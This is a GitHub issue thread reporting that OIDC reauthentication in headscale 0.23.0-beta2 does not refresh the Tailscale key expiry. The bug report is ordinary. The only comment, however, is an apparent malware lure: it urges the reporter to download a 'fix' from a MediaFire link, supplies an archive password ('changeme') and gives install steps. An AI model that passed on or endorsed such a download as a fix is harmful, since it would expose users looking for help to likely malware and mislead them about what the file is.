### ISSUE TITLE
[Bug] Reauthenticate with OIDC does not work in 0.23.0-beta2

### ISSUE THREAD

**Issue by mpoindexter** [juanfont/headscale#2079]
### Is this a support request?

- [X] This is not a support request

### Is there an existing issue for this?

- [X] I have searched the existing issues

### Current Behavior

When I click "Reauthenticate" in the Tailscale menu, a web browser opens, goes through the OIDC authentication flow, and the resulting web page shows reauthenticated. The Tailscale menu item that shows when the device key expires does not update.

### Expected Behavior

Clicking Reauthenticate results in a refreshed key after authentication

### Steps To Reproduce

1. Click Reauthenticate in Tailscale menu when connected to a Headscale server configured to use OIDC
2. After authentication observe that the key expiry does not update

### Environment

```markdown
- OS: MacOS
- Headscale version: 0.23.0-beta2
- Tailscale version: 1.72.0 MacOS
```

### Runtime environment

- [ ] Headscale is behind a (reverse) proxy
- [X] Headscale runs in a container

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
